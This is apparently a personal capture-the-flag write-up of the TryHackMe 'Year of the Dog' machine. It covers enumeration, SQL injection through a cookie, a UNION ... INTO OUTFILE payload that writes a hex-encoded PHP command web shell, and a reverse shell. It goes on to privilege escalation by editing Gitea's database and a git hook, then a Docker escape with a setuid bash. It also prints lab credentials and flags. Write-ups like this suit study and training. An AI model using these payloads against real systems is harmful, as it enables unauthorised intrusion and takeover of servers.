Skip to main content
  1. Writeups/
  2. TryHackMe/

Year of the Dog

·1027 words·5 mins
TryHackMe Linux Hard
Table of Contents

Enumeration
#

Lets start with the simple nmap scan.

nmap -sVC 10.10.104.237             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 13:45 +0545
Nmap scan report for 10.10.104.237 (10.10.104.237)
Host is up (0.17s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:c9:dd:9b:db:95:9e:fd:19:a9:a6:0d:4c:43:9f:fa (RSA)
|   256 c3:fc:10:d8:78:47:7e:fb:89:cf:81:8b:6e:f1:0a:fd (ECDSA)
|_  256 27:68:ff:ef:c0:68:e2:49:75:59:34:f2:bd:f0:c9:20 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Canis Queue
|_http-server-header: Apache/2.4.29 (Ubuntu)
843/tcp   filtered unknown
1002/tcp  filtered windows-icfw
1069/tcp  filtered cognex-insight
1074/tcp  filtered warmspotMgmt
2041/tcp  filtered interbase
3367/tcp  filtered satvid-datalnk
3690/tcp  filtered svn
3809/tcp  filtered apocd
7921/tcp  filtered unknown
8654/tcp  filtered unknown
9040/tcp  filtered tor-trans
10566/tcp filtered unknown
10629/tcp filtered unknown
16992/tcp filtered amt-soap-http
24800/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.44 seconds

Hmm lets check the port 80.

Hmm lets do directory busting. Hmmm nothing interesting there.

Lets try to do subdomain and vhost but the room hasn’t provided us with specific domain name. Lets use nikto.

Hmm nothing useful i guess.

Exploit
#

There is something on cookie.

Random strings. Hmmm. Is it like a hash or something. Lets change that.

And something chnaged but why error? Does it need a fixed sized string or something. Lets try. But only error showed up.

I spend many time and got the hint of sql. If server using query to determine the result by that value in cookie,then it might be vulnerable.

Okay but it was unexpected. Lets try to exploit. After many tries,we finally got right payload and without ;.

2ccffd5893d5c6ea78c8fd68813a773d' UNION SELECT 1,2-- -

Uff its so random. Okay lets enumerate the database.

I captured the request in caido to make it easy.

I was trying different thing like trying to tables,columns etc. and got this message.

Now I have a strong feeling that RCE can be possible. Lets try.

Foothold
#

And I guess it worked.

2ccffd5893d5c6ea78c8fd68813a773d'UNION SELECT 1, 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E INTO OUTFILE '/var/www/html/shell.php' -- -

Lets try to execute command.

Lets get reverse shell. And now we are inside.

Lets see what can i do. We got one password.

Hmm so there is use of git and gitea.

Privelege Escalation with Password Leak
#

Lets see that work_analysis. Hmm this is some kind log log file.

Lets see this might contain some creds. And i guess we got it at first.

Lest try to login. Ohh i thought it was dylanLabr4d0rs4L1f3 but it was only Labr4d0rs4L1f3.

And we got the flag.

THM{OTE3MTQyNTM5NzRiN2VjNTQyYWM2M2Ji}

Privelege Escalation and Docker Escape
#

Now lets do privelege escalation. Lets see that before git thing.

Hmm. Running linpeas,we can see this.

Lets forward this port to our system by ssh.

ssh -L 3000:localhost:3000 dylan@ip

And now we can access it via http://localhost:3000 on our local machine.

Lets see what can we do.

I tried logging in with dylans email and password.

Email:dylan@yearofthedog.thm
Pass:Labr4d0rs4L1f3

(Email can be found in several git directories on the machine.)

But its also need a passcode.

Hmm is it any passcode stored there or anything like this. Lets see.

grep -Ri "passcode" .

Hmm something in ./gitea/log/gitea.log and ./gitea/gitea.db. Lets check that out. That log file has something but gitea.db has a lot.

Lets download the file via python server and use sqlite3. We can do this to get tables. .tables

And do this. SELECT * FROM two_factor; And we will get a token.

But i think its not useful.

I also tried registering the user.

After that, I again downloaded the .db file and there is our user.

After few talk with chatGPT cause i am weak at using sqlite3,we can check the info of columns.

PRAGMA table_info(user);

So there is is_admin in 26th index.

Lets see the result of

SELECT * FROM user;

Or for more easy,

select lower_name,is_admin from user;

So here the user hack isn’t admin.

Lets change that to admin.

UPDATE user SET is_admin = 1 WHERE lower_name = 'hack';

So now user hack is admin.

Now lets replace that .db file from victim machine to ours new one.

scp gitea.db dylan@ip:/gitea/gitea/gitea.db

And now refreshing the page,we can see the administration page. (I changed the username to hehe in upcoming cause the machine expired)

And there is a repo called test-repo.

Now we can exploit this.

(In Gitea (and Git in general), git hooks are used to automate tasks and enforce certain rules during the Git workflow. They are usually shell scripts (or executable scripts) located in the .git/hooks/ directory of a repository, and they are executed when certain Git actions occur, such as git commit, git push, or git merge.) -chatgpt

So if we could edit it we could run our script and that might give us with the root shell. Lets see. Lets add our rev shell here.

I will add 2-3 different reverse shells cause many some mightn’t work.

Now lets clone that repo in our victim’s machine to make that script run cause it automatically runs when any commit happens.

Lets do it.

git clone http://localhost:3000/Dylan/Test-Repo.git
cd Test-Repo/
echo "changes" >> README.md
git add .
git commit -m "changes"
git push

And we should now got the shell in listenner.

Hmm but this is a git shell. Ohh but with root priveleges.

So we have now sudo to run anything as root.

And we are root but in docker.

Lets escape. Cause we are in git shell,there might be something connected with main host.

Lets check that /app and /data. And /data has same thing as main host.

Hmm this might be connected.

And app also have gitea but something odd here.

Lets go on main host’s /gitea/gitea and do this.

cp /bin/bash .

Now from that another docker as root on `/data/gitea,

chown root:root bash
chmod 4777 bash

Now we can go to the main host and there will be bash with setuid of root.

And we are root. THM{MzlhNGY5YWM0ZTU5ZGQ0OGI0YTc0OWRh}

Done
#

And done.

Learned lots of things again. I hope you are doing great. Take care :).

Refs: revshell.com full tty shell